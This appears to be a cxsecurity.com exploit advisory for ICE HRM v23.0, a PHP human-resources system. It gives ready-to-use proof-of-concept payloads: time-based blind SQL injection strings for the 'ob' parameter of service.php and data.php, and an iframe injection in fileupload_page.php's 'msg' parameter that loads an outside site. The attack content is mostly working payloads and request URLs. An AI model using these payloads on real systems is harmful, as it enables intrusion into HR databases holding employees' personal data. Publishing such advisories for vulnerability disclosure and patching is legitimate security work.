ICE HRM 23.0 SQL / Iframe Injection

2019.03.17
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

=========================================================================================== # Exploit Title: ICE HRM - aoba SQL Inj. # Dork: N/A # Date: 14-03-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: http://icehrm.org # Software Link: https://sourceforge.net/projects/icehrm/ # Version: v23.0 # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: ICE Hrm is a Human resource management system for small and medium sized organizations. It has a rich UI built with PHP and Java Script. =========================================================================================== # POC - SQLi (blind) # Parameters : ob # Attack Pattern : 1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f # POST Method : http://localhost/icehrmv23OS/app/service.php =========================================================================================== ########################################################################################### =========================================================================================== # Exploit Title: ICE HRM - aoba SQL Inj. # Dork: N/A # Date: 14-03-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: http://icehrm.org # Software Link: https://sourceforge.net/projects/icehrm/ # Version: v23.0 # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: ICE Hrm is a Human resource management system for small and medium sized organizations. It has a rich UI built with PHP and Java Script. =========================================================================================== # POC - SQLi (blind) # Parameters : ob # Attack Pattern : 1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f # GET Method : http://localhost/icehrmv23OS/app/data.php?t=Employee&sm=%7B%22nationality%22:[%22Nationality%22,%22id%22,%22name%22],%22ethnicity%22:[%22Ethnicity%22,%22id%22,%22name%22],%22immigration_status%22:[%22ImmigrationStatus%22,%22id%22,%22name%22],%22employment_status%22:[%22EmploymentStatus%22,%22id%22,%22name%22],%22job_title%22:[%22JobTitle%22,%22id%22,%22name%22],%22pay_grade%22:[%22PayGrade%22,%22id%22,%22name%22],%22country%22:[%22Country%22,%22code%22,%22name%22],%22province%22:[%22Province%22,%22id%22,%22name%22],%22department%22:[%22CompanyStructure%22,%22id%22,%22title%22],%22supervisor%22:[%22Employee%22,%22id%22,%22first_name%20last_name%22]%7D&cl=[%22id%22,%22image%22,%22employee_id%22,%22first_name%22,%22last_name%22,%22mobile_phone%22,%22department%22,%22gender%22,%22supervisor%22]&ft=%7B%22status%22:%22Active%22%7D&ob=1%20%2b%20((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A))%2f*%27XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR%27%7c%22XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR%22*%2f =========================================================================================== =========================================================================================== # Exploit Title: ICE HRM - amsga Frame Inj. # Dork: N/A # Date: 14-03-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: http://icehrm.org # Software Link: https://sourceforge.net/projects/icehrm/ # Version: v23.0 # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: ICE Hrm is a Human resource management system for small and medium sized organizations. It has a rich UI built with PHP and Java Script. =========================================================================================== # POC - Frame Inj. # Parameters : msg # Attack Pattern : %3ciframe+src%3d%22http%3a%2f%2fcyber-warrior.org %2f%3f%22%3e%3c%2fiframe%3e # GET Method : http://localhost/icehrmv23OS/app/fileupload_page.php?id=_id_&msg=<iframe src="http://cyber-warrior.org/ ?"></iframe>&file_group=_file_group_&file_type=_file_type_&user=_user_ ===========================================================================================


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top